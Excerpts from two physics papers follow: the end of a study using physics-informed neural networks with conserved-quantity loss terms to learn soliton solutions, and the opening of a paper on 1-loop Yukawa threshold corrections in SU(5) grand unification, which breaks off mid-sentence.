\(\Theta=\left\{W^{k},b^{k}\right\}_{k=1}^{M}\). Thus, solving the FLE is now transformed into an optimization problem. The global minimum of the loss function corresponds to the solution of the FLE subject to particular initial and boundary conditions. ### Loss function with conserve quantity Although the basic PINN method converges to a minimum value, it cannot learn the exact soliton solution of the FLE. To address this problem, we modify the loss function by multiplying some real coefficient \(\gamma\) in the physics informed loss function, i.e \(f_{r}\) and \(f_{m}\). Physics informed loss refers to imposing FLE residuals in the total loss functions to regularize NN training. The modified loss function is given as follows: \[Loss(\Theta)=Loss_{r_{0}}+Loss_{m_{0}}+Loss_{r_{b}}+Loss_{m_{b}}+\gamma(Loss_ {f_{r}}+Loss_{f_{m}}) \tag{12}\] where \(\gamma\) determines how much of a physics informed loss function is to be contributed to the total loss function. Embedding the knowledge of physical information, namely energy conservation law, momentum conservation law etc into a NN as a loss function improves the PINN to capture the right solution and generalize better result even with a small number of training data. Therefore, we further improve the loss function by introducing additional physical information from the FLE. Being an integrable equation, FLE has many conserved quantities. We use conserve quantities of FLE in the PINN method to improve the loss function by adding them as additional loss terms which have to be minimized during training. The first few conserved quantities for FLE are given below, including both positive and negative hierarchy, which are obtained by solving the methods described in [42]. \[H_{1}=\int_{-\infty}^{+\infty}|u_{x}|^{2}dx \tag{13}\] \[H_{3}=\int_{-\infty}^{+\infty}(|u_{x}|^{4}-iu_{x}^{*}u_{xx})dx \tag{14}\] \[H_{5}=\int_{-\infty}^{+\infty}(-u_{x}^{*}u_{xxx}+2|u_{x}|^{6}-3i|u_{x}|^{2}u_{x}^ {*}u_{xx})dx \tag{15}\] \[H_{-1}=\int_{-\infty}^{+\infty}-iu_{x}^{*}udx \tag{16}\] \[H_{-3}=\int_{-\infty}^{+\infty}-(|u|^{2}+i|u|^{2}uu_{x}^{*})dx \tag{17}\] Since the temporal derivative of conservative quantity must be minimum, we write \[\frac{\partial}{\partial t}H_{i}=0,\quad i=1,3,5,-1,-3 \tag{18}\] \[L_{conserve}=\sum_{i=1,3,5,-1,-3}||\frac{\partial}{\partial t}\hat{H}_{i}||^{2} \tag{19}\] Where \(L_{conserve}\) corresponds to loss on conserve quantities of FLE. Thus, improved loss function with conserved quantity: \[Loss(\Theta)=Loss_{r_{0}}+Loss_{m_{0}}+Loss_{r_{b}}+Loss_{m_{b}}+\gamma_{1}( Loss_{f_{r}}+Loss_{f_{m}})+\gamma_{2}L_{cnsr} \tag{20}\] where \(\gamma_{1}\) and \(\gamma_{2}\) are two real-valued coefficients that determine the contribution from the physics loss function and conserved quantity loss function respectively. Improved loss functions present more precise soliton behaviors with fewer sample points. ### Algorithm **Step 1**: Specification of training data, initial training data: \((x^{i},t^{i},r^{i},m^{i})_{i=1}^{N_{0}}\); boundary training data: \((x^{j},t^{j},r^{j},m^{j})_{j=1}^{N_{b}}\); residual training points: \((x^{l}_{f},t^{l}_{f})_{l=1}^{N_{f}}\) **Step 2**: Construct the NN \(u_{NN}(\Theta)\) with random initialization of trainable parameters \(\Theta\in\{W,b\}\) **Step 3**: Construct the PINN by substituting surrogate \(u_{NN}\) into the governing equation. **Step 4**: Specification of the loss function, that include the weighted loss function and conserved quantity. **Step 5** : Minimize the loss function to find best parameters \(\Theta\) using ADAM Optimizer ## 4 Results ### Bright Soliton We consider the initial condition \(u(x,-1)=g(x)\) for \(a=1\) and \(b=1\) \[g(x)=-\frac{2}{1+i}\frac{e^{(x-\frac{1}{2})+i(x+\frac{1}{2})}}{e^{2(x-\frac{1}{2} )}-1-i}\quad x\in[-5,5] \tag{21}\] and the vanishing boundary condition, namely \[u(x=-5,t)=u(x=5,t)=0,\quad t\in[-1,1]\] Here, we chose \(x\in[-5,5]\) and \(t\in[-1,1]\) as the spatial and temporal interval. Training data \(\left\{x_{0}^{i},-1\right\}_{i=1}^{N_{0}}\) for initial condition consists of \(N_{0}=100\) data points, randomly drawn from uniform distribution over the half open interval \([-5,5)\), similarly, \(N_{b}=100\) data points \(\left\{\pm 5,t_{b}^{i}\right\}_{i=1}^{N_{b}}\) are drawn from uniform distribution over the half open interval \([-1,1)\) to enforce the vanishing boundary condition. Moreover, we have selected \(N_{f}=1000\) number of randomly sampled collocation points to enforce the eq. 1 inside the computational domain. All these randomly sampled points are drawn from the uniform distribution over the spatial and temporal intervals, \(x\in[-5,5]\) and \(t\in[-1,1]\). To obtain a data-driven bright soliton, we construct a feed-forward NN with eight hidden layers with 40 neurons in each layer and hyperbolic tan as the activation function. Minimizing the loss function by optimizing all the learnable parameters using the ADAM optimizer with a learning rate of 0.001, we approximate the bright 1-SS. Considering \(\gamma=0.001\) in eq. 12 we obtain \(L_{2}\) error, where total loss= 0.00085254 and physics loss = 0.79478168 after 30,000 iterations in time 1187.6953 seconds. Again considering \(\gamma_{1}=0.001\) and \(\gamma_{2}=0.00001\) multiplying with \(H_{-1}\) conserved loss function in eq. 20 we get \(L2\) error where total loss = 0.00072432 and physics loss = 0.647380 after 30,000 iterations in 4393.4230 seconds. Thus, we find that inclusion of conserved quantities to the loss function enables us to minimization of loss more effectively than when it is excluded. The results are demonstrated in Figure 2 and Figure 3. Figure. 2 (a) shows density plot of exact bright 1-SS, Figure.2(b) shows density plot of data-driven bright 1-SS and Figure 2(c) shows density plot of error between exact and data-driven bright 1-SS. Figure 3 shows a comparison of the soliton at different time instance (i) at t = -0.70, (ii) at t = -0.29 (iii) at t = 0.52. ### Dark Soliton Initial value condition for dark soliton \(u(x,-1)=g(x)\), considering \(a=\sqrt{2}\), \(b=1\), \(\kappa=1\), \(\rho=1\) and \(\omega=3\). \[g(x)=e^{i(x+3)}\frac{1-\frac{2+i}{2}\frac{1+i}{1-i}e^{2x-1}}{1+\frac{2-i}{2}e^{ 2x-1}}\quad,x\in[-5,5]\] and the boundary conditions \[u(-5,t)=u(5,t)=1,\quad t\in[-1,1]\] Here, we chose \(x\in[-5,5]\) and \(t\in[-1,1]\) as the spatial and temporal interval. The training data set is obtained considering the exact solution at the initial boundary data i.e. at \(x=-5\), \(x=5\), and \(t=-1\) dividing the spatial region [-5, 5] into \(N_{b}=200\) data points and temporal region [-1,1] into \(N_{0}=100\) points. We have also selected a \(N_{f}=2000\) number of randomly sampled collocation points to enforce the eq. 4 inside the computational domain. All these randomly sampled points are drawn from the uniform distribution over the spatial and temporal intervals \(x\in[-5,5]\) and \(t\in[-1,1]\). We use the 9 hidden layer deep PINN with 60 neurons per layer and a hyperbolic tan activation function to obtain data driven dark 1-SS. To minimizing the loss function, we use the ADAM optimizer with a learning rate 0.001. We obtain dark 1-SS with total loss= 0.00221427 and physics loss = 1.88655448 after 30,000 iterations with coefficient value of \(\gamma_{1}=0.001\) to physics loss function and \(\gamma_{2}=0.001\) to the \(H_{-3}\) conserved quantities loss function. The results are demonstrated in Figure. 4 and 5. Figure. 2 (a) shows density plot of exact dark 1-SS, Figure. 2 (b) shows density plot of data-driven dark 1-SS and Figure. 2 (c) shows density plot of error between exact and data-driven dark 1-SS. We present a comparison between the exact and data-driven dark soliton solution at three different time instants (i) \(t=-0.29\), (ii) \(t=-0.70\) and (ii) \(t=0.72\) in Figure 5. improved PINN. Although PINN can predict bright soliton solutions with great accuracy, for dark soliton, there is still scope for improving its accuracy. We find that using conserved quantities of FLE as another loss term helps us to obtain a data-driven soliton solution with greater accuracy. Therefore, incorporating the information of conserved quantities should improve the performance of the NN by improving its convergence as well as generalization. ## Acknowledgement G.K. Saharia acknowledges Google Colab and Kaggle for their free GPU services. S. Talukdar and R. Dutta acknowledges DST, Govt. of India for Inspire fellowship, grant nos. DST Inspire Fellowship 2020/IF200278; 2020/IF200303.
2310.16563
Quantum corrections and the minimal Yukawa sector of $SU(5)$
It is well-known that the $SU(5)$ grand unified theory, with the standard model quarks and leptons unified in $\overline{5}$ and $10$ and the electroweak Higgs doublet residing in $5$ dimensional representations, leads to relation, $Y_d=Y_e^T$, between the Yukawa couplings of the down-type quarks and the charged leptons. We show that this degeneracy can be lifted in a phenomenologically viable way when quantum corrections to the tree-level matching conditions are taken into account in the presence of one or more copies of gauge singlet fermions. The 1-loop threshold corrections arising from heavy leptoquark scalar and vector bosons, already present in the minimal model, and heavy singlet fermions can lead to realistic Yukawa couplings provided their masses differ by at least two orders of magnitude. The latter can also lead to a realistic light neutrino mass spectrum through the type I seesaw mechanism if the colour partner of the Higgs stays close to the Planck scale. Most importantly, our findings demonstrate the viability of the simplest Yukawa sector when quantum corrections are considered and sizeable threshold effects are present.
Ketan M. Patel, Saurabh K. Shukla
2023-10-25T11:34:10Z
http://arxiv.org/abs/2310.16563v2
# Quantum corrections and the minimal Yukawa sector of \(Su(5)\) ###### Abstract It is well-known that the \(SU(5)\) grand unified theory, with the standard model quarks and leptons unified in \(\overline{5}\) and \(10\) and the electroweak Higgs doublet residing in \(5\) dimensional representations, leads to relation, \(Y_{d}=Y_{e}^{T}\), between the Yukawa couplings of the down-type quarks and the charged leptons. We show that this degeneracy can be lifted in a phenomenologically viable way when quantum corrections to the tree-level matching conditions are taken into account in the presence of one or more copies of gauge singlet fermions. The \(1\)-loop threshold corrections arising from heavy leptoquark scalar and vector bosons, already present in the minimal model, and heavy singlet fermions can lead to realistic Yukawa couplings provided their masses differ by at least two orders of magnitude. The latter can also lead to a realistic light neutrino mass spectrum through the type \(1\) seesaw mechanism if the colour partner of the Higgs stays close to the Planck scale. Most importantly, our findings demonstrate the viability of the simplest Yukawa sector when quantum corrections are considered and sizeable threshold effects are present. ## I Introduction After the remarkable realization of the potential unification of the standard model (SM) gauge symmetries into a single gauge symmetry nearly fifty years ago [1; 2; 3], it has since become well-established that the Yukawa sector of the SM plays a pivotal role in determining the minimal and viable configurations of grand unified theories (GUT). The latter's potential to partially or completely unite quarks and leptons, in conjunction with the simplest choice of the Higgs field(s) in the Yukawa sector, often results in correlations among the effective SM Yukawa couplings that are inconsistent with observations. The most glaring and simplest example of the above is the \(SU(5)\) GUTs with only \(5\)-dimensional (\(5\) and \(\overline{5}\)) Lorentz scalar(s) in the Yukawa sector in their ordinary (supersymmetric) versions. Both lead to \[Y_{d}=Y_{e}^{T}\,, \tag{1}\] at the scale of the unified symmetry breaking, namely \(M_{\rm GUT}\), for the down-type quark and charged-lepton Yukawa coupling matrices \(Y_{d}\) and \(Y_{e}\), respectively. The degeneracy between the two sectors predicted by Eq. (1) is not supported by the GUT scale extrapolated values of the effective Yukawa couplings determined from the measured masses of the down-type quarks and the charged leptons [4; 5]. The largest mismatch arises in the case of non-supersymmetric theories in which the extrapolation of the SM data implies, \(y_{b}/y_{\tau}\approx 2/3\), \(y_{s}/y_{\mu}\approx 1/5\) and \(y_{d}/y_{e}\approx 2\), at \(M_{\rm GUT}=10^{16}\) GeV. Deviation from the degeneracy shown in Eq. (1) can be achieved through several means: (a) Expanding the scalar sector [6; 7; 8; 9; 10; 11], for instance, by introducing a \(45\)-dimensional Higgs field, or (b) Incorporating higher-dimensional non-renormalizable operators [12; 13; 14; 15; 16; 17], or (c) Introducing vector-like fermions that mix with the charged leptons and/or down-type quarks residing in the chiral multiplets of \(SU(5)\)[18; 19; 20; 21; 22; 23; 24; 25; 26]. Each of these approaches alters the tree-level matching condition, Eq. (1), and introduces new couplings. These new couplings can be harnessed to obtain effective Yukawa couplings compatible with the SM. In this article, we present a rather simple approach to alleviate the degeneracy between charged leptons and down-type quarks. Our method involves incorporating higher-order corrections to the tree-level matching conditions for the Yukawa couplings. Non-trivial implications of such corrections in the context of supersymmetric versions of \(SO(10)\) GUTs have been pointed out in [27; 28; 29]1. In the context of \(SU(5)\), we show that the inclusion of such corrections does not necessitate the introduction of new fermions or scalars charged under the \(SU(5)\) for modifying the tree-level Yukawa relations. This sets the present proposal apart from the previous ones outlined as (a-c) above. Specifically, we demonstrate that by expanding the minimal non-supersymmetric \(SU(5)\) framework to include fermion singlets and accounting for threshold corrections to the Yukawa couplings originating from these singlets, along with the leptoquark scalar and vector components already present in the minimal setup, a fully realistic fermion spectrum can be achieved. Footnote 1: Nevertheless, the degeneracy, as in Eq. (1), is absent in these models even at the tree level due to the presence of multiple scalars containing the SM Higgs doublets. ## II Yukawa relations at \(1\)-loop The Yukawa sector of the model is comprised of three generations of \(\mathbf{10}\), \(\overline{\mathbf{5}}\) and \(N\) generations of the gauge singlet \(\mathbf{1}\) Weyl fermions and a Lorentz scalar \(5_{H}\). The most general renormalizable interactions between these fields can be parametrized as \[\mathcal{L}_{\rm Y} = \frac{1}{4}(Y_{1})_{ij}\mathbf{10}_{i}^{T}C\mathbf{10}_{j}5_{H}+ \sqrt{2}(Y_{2})_{ij}\mathbf{10}_{i}^{T}C\overline{\mathbf{5}}_{j}5_{H}^{*} \tag{2}\] \[+ (Y_{3})_{i\alpha}\overline{\mathbf{5}}_{i}^{T}C\mathbf{1}_{a}5_{H }+{\rm h.c.}\,,\] with \(i,j=1,2,3\) and \(\alpha=1,...,N\) denotes the generations and \(C\) is the usual charge-conjugation matrix. We have suppressed the gauge and Lorentz indices for brevity. The symmetric nature of the first term implies \(Y_{1}=Y_{1}^{T}\). The singlet fermions, also to be referred as the right-handed (RH) neutrinos, can acquire a gauge invariant Majorana masses: \[\mathcal{L}_{M}=-\frac{1}{2}(M_{N})_{\alpha\beta}\mathbf{1}_{\alpha}^{T}C \mathbf{1}_{\beta}+{\rm h.c.}\,. \tag{3}\] The SM quarks and leptons residing in the \(SU(5)\) multiplets are identified as \(\mathbf{10}^{ab}=\frac{1}{\sqrt{2}}\epsilon^{abc}u_{c}^{C}\), \(\mathbf{10}^{am}=-\frac{1}{\sqrt{2}}q^{am}\), \(\mathbf{10}^{mn}=-\frac{1}{\sqrt{2}}\epsilon^{mn}e^{C}\), \(\overline{\mathbf{5}}_{a}=d_{a}^{C}\), \(\overline{\mathbf{5}}_{m}=\epsilon_{mn}l^{n}\) and \(\mathbf{1}=\nu^{C}\), where \(a,b,c\) denote the color while \(m,n\) are \(SU(2)\) indices. For the scalar, we define a colour triplet \(T^{a}\equiv 5_{H}^{a}\) and an electroweak doublet \(h^{m}\equiv 5_{H}^{m}\)[30]. Decompositions of Eq. (2) then lead to the following Yukawa interactions with the colour triplet and Higgs: \[-\mathcal{L}_{\rm Y}^{(T)} = (Y_{1})_{ij}\left(u_{i}^{CT}Ce_{j}^{C}+\frac{1}{2}q_{i}^{T}Cq_{j }\right)T \tag{4}\] \[- (Y_{3})_{i\alpha}\,d_{i}^{CT}C\nu_{\alpha}^{C}T\] \[- (Y_{2})_{ij}\left(u_{i}^{(CT}Cd_{j}^{C}+q_{i}^{T}Cl_{j}\right)T^{ *}+{\rm h.c.}\,,\] and \[-\mathcal{L}_{\rm Y}^{(h)} = (Y_{1})_{ij}q_{i}^{T}Cu_{j}^{C}\tilde{h}+(Y_{2})_{ij}q_{i}^{T}Cd_ {j}^{C}h^{*} \tag{5}\] \[+ (Y_{3})_{i\alpha}l_{i}^{T}C\nu_{\alpha}^{C}\tilde{h}+(Y_{2}^{T})_ {ij}l_{i}^{T}Ce_{j}^{C}h^{*}+{\rm h.c.}\,,\] where \(\tilde{h}=\epsilon h\) and we have suppressed the \(SU(3)\) and \(SU(2)\) contractions. Matching of \(\mathcal{L}_{\rm Y}^{(h)}\) with the SM Yukawa Lagrangian at tree level leads to \(Y_{u}=Y_{1}\) and \(Y_{d}=Y_{e}^{T}=Y_{2}\) at the renormalization scale \(\mu=M_{\rm GUT}\). For the matching at 1-loop, the Yukawa couplings receive two types of contributions. The first arises from the vertex corrections involving the colour triplet or the leptoquark gauge boson in the loop. The interaction of the latter with the SM fermions originates from the unified gauge interaction and it is given by [4; 5] \[-\mathcal{L}_{\rm G}^{(X)} = \frac{g}{\sqrt{2}}\overline{X}_{\mu}\left(\overline{d^{C}}_{i} \overline{\sigma}^{\mu}l_{i}-\overline{q}_{i}\overline{\sigma}^{\mu}u_{i}^{C}- \overline{e^{C}}_{i}\overline{\sigma}^{\mu}q_{i}\right)+{\rm h.c.}\,,\] where \(X\) transforms as \((3,2,-5/6)\) under the SM gauge symmetry. The second type of contribution to the Yukawa threshold correction is due to wavefunction renormalization of fermions and scalar involving at least one of the heavy fields in the loop. The 1-loop corrected matching condition for the Yukawa couplings at a renormalization scale \(\mu\) is given by \[Y_{f}=Y_{f}^{0}\left(1-\frac{K_{h}}{2}\right)+\delta Y_{f}-\frac{1}{2}\left(K_{ f}^{T}Y_{f}^{0}+Y_{f}^{0}K_{f^{C}}\right), \tag{7}\] where \(f=u,d,e,\nu\). The details of the derivation of the above expression are outlined in Appendix A. In Eq (7), \(\delta Y_{f}\) are the finite parts of 1-loop corrections to the Yukawa vertex \(Y_{f}\) while \(K_{f,f^{C},h}\) are the finite parts of the wavefunction renormalization diagrams involving heavy particles in the loops evaluated in the \(\overline{\rm MS}\) scheme. \(Y_{f}^{0}\) denotes the tree-level Yukawa coupling matrix. As mentioned earlier, \[Y_{u}^{0}=Y_{1}\,,\ \ Y_{d}^{0}=Y_{2}\,,\ \ Y_{e}^{0}=Y_{2}^{T}\,,\ \ Y_{\nu}^{0}=Y_{3}\,, \tag{8}\] at \(\mu=M_{\rm GUT}\). Next, we compute \(\delta Y_{f}\) using the interaction terms given in Eqs. (4,5,6) and assuming massive color triplet scalar \(T\), vector leptoquark \(X\) and \(N\) generations of the RH neutrinos \(\nu_{\alpha}^{C}\). We find, \[(\delta Y_{u})_{ij} = 4g^{2}(Y_{1})_{ij}f[M_{X}^{2},0]\] \[+ \left(Y_{1}Y_{2}^{*}Y_{2}^{T}+Y_{2}Y_{2}^{T}Y_{1}^{T}\right)_{ij} f[M_{T}^{2},0],\] \[(\delta Y_{d})_{ij} = 2g^{2}(Y_{2})_{ij}f[M_{X}^{2},0]+\left(Y_{1}Y_{1}^{*}Y_{2}\right)_ {ij}f[M_{T}^{2},0]\] \[+ \sum_{\alpha}\left(Y_{2}Y_{3}^{*}\right)_{i\alpha}\left(Y_{3}^{T} \right)_{\alpha j}f[M_{T}^{2},M_{N_{\alpha}}^{2}],\] \[(\delta Y_{e})_{ij} = 6g^{2}(Y_{2}^{T})_{ij}f[M_{X}^{2},0]+3\left(Y_{2}^{T}Y_{1}^{*}Y_{ 1}\right)_{ij}f[M_{T}^{2},0],\] \[(\delta Y_{\nu})_{i\alpha} = 3\left(Y_{2}^{T}Y_{2}^{*}Y_{3}\right)_{i\alpha}f[M_{T}^{2},0], \tag{9}\] at the scale \(\mu\). Here, \(M_{N_{\alpha}}\) is the mass of \(\nu_{\alpha}^{C}\) and \(f[m_{1}^{2},m_{2}^{2}]\) is a loop integration factor and it is given in Eq. (20) in the Appendix B. It can be noticed that other than the overall colour factor, \(\delta Y_{d}\) and \(\delta Y_{e}\) differ by the contribution from the heavy RH neutrinos. Because of the tree-level Yukawa couplings between \(d_{i}^{C}\), \(\nu_{\alpha}^{C}\) and \(T\) in Eq. (4), the \(Y_{d}\) gets threshold correction from the RH neutrinos and colour triplet scalar. It is noteworthy that the corrections \(\delta Y_{f}\) vanish in the supersymmetric version of the model [31], due to the perturbative non-renormalisation theorem for the supersymmetric field theories [32; 33]. The computations of the finite parts of wavefunction renormalization for the light fermions and scalar at 1-loop, involving at least one heavy fields in the loop, lead to: \[(K_{q})_{ij} = 3g^{2}\delta_{ij}h[M_{X}^{2},0]\] \[- \frac{1}{2}\left(Y_{1}^{*}Y_{1}^{T}+2Y_{2}^{*}Y_{2}^{T}\right)_{ij}h [M_{T}^{2},0],\] \[(K_{u^{c}})_{ij} = 4g^{2}\delta_{ij}h[M_{X}^{2},0]\] \[- \left(Y_{1}^{*}Y_{1}^{T}+2Y_{2}^{*}Y_{2}^{T}\right)_{ij}h[M_{T}^{ 2},0],\] \[(K_{d^{c}})_{ij} = 2g^{2}\delta_{ij}h[M_{X}^{2},0]-2\left(Y_{2}^{\dagger}Y_{2}\right) _{ij}h[M_{T}^{2},0]\] \[- \sum_{\alpha}\left(Y_{3}^{*}\right)_{i\alpha}\left(Y_{3}^{T} \right)_{\alpha j}h[M_{T}^{2},M_{N_{\alpha}}^{2}],\] \[(K_{l})_{ij} = 3g^{2}\delta_{ij}h[M_{X}^{2},0]-3\left(Y_{2}^{\dagger}Y_{2}\right) _{ij}h[M_{T}^{2},0],\] \[(K_{e^{c}})_{ij} = 6g^{2}\delta_{ij}h[M_{X}^{2},0]-3\left(Y_{1}^{\dagger}Y_{1}\right) _{ij}h[M_{T}^{2},0],\] \[(K_{\nu^{c}})_{\alpha\beta} = -3\left(Y_{3}^{\dagger}Y_{3}\right)_{\alpha\beta}h[M_{T}^{2},0],\] \[K_{h} = \frac{g^{2}}{2}\,\left(f[M_{X}^{2},M_{T}^{2}]+g[M_{X}^{2},M_{T}^{ 2}]\right), \tag{10}\] at the scale \(\mu\). The loop integration factors are defined in Appendix B. Again, only \(K_{d^{C}}\) receives a contribution from the singlet fermions. As we show in the next sections, these contributions from singlet fermions are crucial for uplifting degeneracy between the charged lepton and down-type quarks. ## III Deviation from \(Y_{d}=Y_{e}^{T}\) It is seen from Eqs. (7,9,10) that the 1-loop corrections break the degeneracy between \(Y_{e}\) and \(Y_{d}\). Explicitly, we obtain at the GUT scale: \[\left(Y_{d}-Y_{e}^{T}\right)_{ij} = -2g^{2}(Y_{2})_{ij}\,\left(2f[M_{X}^{2},0]-h[M_{X}^{2},0]\right) \tag{11}\] \[- \left(Y_{1}Y_{1}^{*}Y_{2}\right)_{ij}\,\left(f[M_{T}^{2},0]+ \frac{5}{8}h[M_{T}^{2},0]\right)\] \[+ \sum_{\alpha}\left(Y_{2}Y_{3}^{*}\right)_{i\alpha}\left(Y_{3} \right)_{j\alpha}\left(f[M_{T}^{2},M_{N_{\alpha}}^{2}]\right.\] \[+ \left.\frac{1}{2}h[M_{T}^{2},M_{N_{\alpha}}^{2}]\right).\] The above is the main result of this paper. It is noteworthy that Eq. (11) not only suggests \(Y_{d}\neq Y_{e}^{T}\) but also implies that the difference between the two matrices is calculable in terms of the masses of the heavy scalar, gauge boson and RH neutrinos and their couplings. The latter also determines the masses of other fermions and hence can be severely constrained as we discuss in the next section. Before assessing the viability of Eq. (11) in reproducing the complete and realistic fermion mass spectrum, we investigate its role for the third generation Yukawa couplings, namely \(y_{b}\) and \(y_{\tau}\), through a simplified analysis. Considering only one RH neutrino with \(M_{N_{1}}=M_{N}\) and only the third generation, one finds from Eq. (11): \[\frac{y_{b}}{y_{\tau}} \simeq 1-2g^{2}\left(2f[M_{X}^{2},0]-h[M_{X}^{2},0]\right) \tag{12}\] \[- 2y_{t}^{2}\left(f[M_{T}^{2},0]+\frac{5}{8}h[M_{T}^{2},0]\right)\] \[+ y_{\nu}^{2}\left(f[M_{T}^{2},M_{N}^{2}]+\frac{1}{2}h[M_{T}^{2},M _{N}^{2}]\right)\,,\] at the GUT scale. Here, \(y_{t}\) is the top-quark Yukawa coupling and \(y_{\nu}=(Y_{3})_{31}\). For some sample values of \(y_{t}\), \(y_{\nu}\) and \(\mu=M_{X}=10^{16}\) GeV, the contours corresponding to different values of the ratio \(y_{b}/y_{\tau}\) on the \(M_{T}\)-\(M_{N}\) plane are displayed in Fig. 1. The GUT scale extrapolation of the observed fermion mass data requires \(y_{b}/y_{\tau}\approx 2/3\). As can be seen from Fig. 1, this can be achieved only if either \(M_{T}\) or \(M_{N}\) is larger than \(\mu=M_{X}\) by at least one to two orders of magnitude. Moreover, \(y_{\nu}\) is also required to be large. For \(g,y_{t}<1\), it is the third term in Eq. (12) which is required to dominantly contribute to uplift the degeneracy between \(y_{b}\) and \(y_{\tau}\) and hence the largest possible value of \(y_{\nu}\) is preferred. \(M_{T}\gg M_{\rm GUT}\) or \(M_{N}\gg M_{\rm GUT}\) along with large \(y_{\nu}\) are needed to overcome the loop suppression factor of \(1/(16\pi)^{2}\). This simple picture provides a clear and qualitative understanding of the favourable mass scales of the colour triplet scalar and RH neutrino and it also holds more or less when the full three generation fermion spectrum is considered as we show in the next section. It is noteworthy that the RH neutrino through its coupling with the lepton doublet generates a contribution to the light neutrino mass through the usual type I seesaw mechanism [34; 35; 36; 37]. It is obtained as \(m_{\nu}=v^{2}y_{\nu}^{2}/M_{N}\). If this contribution is required to generate the atmospheric neutrino mass scale then one finds, \[M_{N}=7.6\times 10^{16}\,\text{GeV}\,\left(\frac{y_{\nu}}{\sqrt{4\pi}}\right)^{2} \,\left(\frac{0.05\,\text{eV}}{m_{\nu}}\right)\,. \tag{13}\] Since \(M_{N}\) cannot be much larger than \(M_{\text{GUT}}\) in this case, phenomenologically viable \(y_{b}/y_{\tau}\) can be achieved only if \(M_{T}>M_{\text{GUT}}\). Conversely, when considering perturbative values of \(y_{\nu}\) and a situation where \(M_{N}\) greatly surpasses \(M_{\text{GUT}}\), the RH neutrino's contribution to the light neutrino mass is rather negligible. This inadequacy to reproduce a viable atmospheric neutrino mass scale necessitates the inclusion of an additional source of neutrino masses. We also provide an example of this in the next section. ## IV Viability test and results To establish if the \(Y_{u}\), \(Y_{d}\) and \(Y_{e}\) are evaluated from Eqs. (7,9,10) can reproduce the realistic values of the SM Yukawa couplings and the quark mixing (CKM) matrix, we carry out the \(\chi^{2}\) optimization. Focusing on the minimal setup, we first consider only one RH neutrino with mass \(M_{N_{1}}\equiv M_{N}\) as mentioned in the previous section. The \(\chi^{2}\) function (see for example [38; 39] for the definition and optimization procedure) includes 9 diagonal charged fermion Yukawa couplings and 4 CKM parameters. For the input values of these parameters at the GUT scale, we evolve the SM Yukawa couplings from \(\mu=M_{t}\) (\(M_{t}\) being the top pole mass) to \(\mu=M_{\text{GUT}}=10^{16}\) GeV using the 2-loop renormalization group equations (RGEs) in the \(\overline{\text{MS}}\) scheme following the procedure outlined in [39]. The 2-loop SM RG equations have been computed using the PyR@TE 3 package [40]. The values of the SM Yukawa and gauge couplings at \(\mu=M_{t}\) are taken from [41]. The RGE extrapolated values at the GUT scale are listed as \(O_{\text{exp}}\) in Table 1 in Appendix C. For the standard deviations, we use \(\pm 30\%\) in the light quark Yukawa couplings (\(y_{u,d,s}\)) and \(\pm 10\%\) in the rest of the observables as considered in the previous fits [39]. Using the freedom to choose a basis in Eq. (2), we set \(Y_{1}\) diagonal and real. The RH neutrino mass matrix, \(M_{N}\), in general \(N\) flavour case can also be chosen real and diagonal simultaneously. \(Y_{2,3}\) are complex in this basis. Using the Eqs. (7,9,10), we then compute the matrices \(Y_{u,d,e}\) and diagonalize them to obtain the nine diagonal Yukawa couplings and quark mixing parameters. These quantities are fitted to the extrapolated data at \(\mu=M_{\text{GUT}}\) by minimizing the \(\chi^{2}\) function. We set \(M_{X}=M_{\text{GUT}}\) and \(g=0.53\) which is an approximate value of the RGE evolved SM gauge couplings at \(\mu=10^{16}\) GeV. Fixing \(M_{T}\) and \(M_{N}\) to some values, we then minimize the \(\chi^{2}\) along with a constrain \(|(Y_{1,2,3})_{ij}|<\sqrt{4\pi}\) on all the input Yukawa couplings to ensure that they are within the perturbative limits [42]. We repeat this procedure for several values of \(M_{T}\) and \(M_{N}\). The obtained distribution of the minimized \(\chi^{2}\) (\(\equiv\chi^{2}_{\text{min}}\)) is displayed in Fig. 2. Note that without 1-loop corrections, i.e. with \(Y_{d}=Y_{e}^{T}\), the obtained value of \(\chi^{2}_{\text{min}}\) is 53. Therefore, values of \(\chi^{2}_{\text{min}}<53\) show improvements due to quantum corrected matching conditions in the model. In particular, for \(\chi^{2}_{\text{min}}<9\), it is ensured that no observable is more than \(\pm 3\sigma\) away from its central value and, therefore, can be considered to lead to viable charged fermion mass spectrum and the quark mixing. It can be seen from Fig. 2, a very good fit of the entire charged fermion mass spectrum and the quark mixing parameters can be obtained if \(M_{T}\) or \(M_{N}\geq 10^{17.2}\) GeV. These results are in a very good agreement with the limits on \(M_{T}\) and \(M_{N}\) obtained for \(y_{b}/y_{\tau}\lesssim 2/3\) in a simplified case discussed earlier and shown in Fig. 1. The three-generation \(\chi^{2}\) analysis also reveals that all the underlying 13 observables can be fitted within their \(\pm 1\sigma\) range (corresponding to \(\chi^{2}_{\text{min}}\leq 3\)) provided (i) \(M_{T}\leq 10^{14.5}\) GeV and \(M_{N}\geq 10^{17.2}\) GeV, or (ii) \(M_{T}\geq 10^{18.2}\) GeV. While the second leads to \(M_{T}\) alarmingly close to the Planck scale making the doublet-triplet splitting problem [43; 44; 45] more severe, the possibility (i) is conceptually allowed and technically a safe choice. Since \(M_{N}\) is a scale independent of \(M_{\text{GUT}}\) in the present framework, the large hierarchy between them is permitted. Also, \(M_{T}\) can be significantly smaller than \(M_{\text{GUT}}\) provided it satisfies the proton lifetime limit, \(M_{T}\gtrsim 10^{11}\) GeV [30]. We list explicitly one benchmark solution from the region (i) which is displayed as Solution I in Table 1 in Appendix C. Although, the RH neutrino is introduced to reproduce the viable charged fermion mass spectrum, its mass and couplings are not constrained from the requirement of the light neutrino masses and mixing parameters. To account for both the solar and atmospheric neutrino mass scales, one needs at least two RH neutrinos in the minimal realization. The light neutrino masses are then generated through the usual type I seesaw mechanism: \[M_{\nu}=-v^{2}\,Y_{\nu}M_{N}^{-1}Y_{\nu}^{T}\,. \tag{14}\] Here, \(M_{\nu}\) is \(3\times 3\) light neutrino mass matrix while \(M_{N}\) is \(2\times 2\) heavy neutrino mass matrix. \(Y_{\nu}\) is \(3\times 2\) matrix which can be computed using Eqs. (7,9,10). The above leads to one massless light neutrino. We extend the \(\chi^{2}\) function to include the solar and atmospheric squared mass differences, three mixing angles and a Dirac CP phase to assess if Eq. (14) along with Eqs. (7,9,10) can provide a realistic spectrum of quarks and leptons. For the input values of neutrino observables, we use the results of the latest fit from [46] and set \(\pm 10\%\) uncertainty as earlier. The RGE effects in neutrino data are neglected as they are known to be small [47; 48; 49; 50] and within the set uncertainty for normal hierarchy in the neutrino masses which is the case considered here. The result of \(\chi^{2}\) minimization for this case is shown in Table 1 as Solution II and the 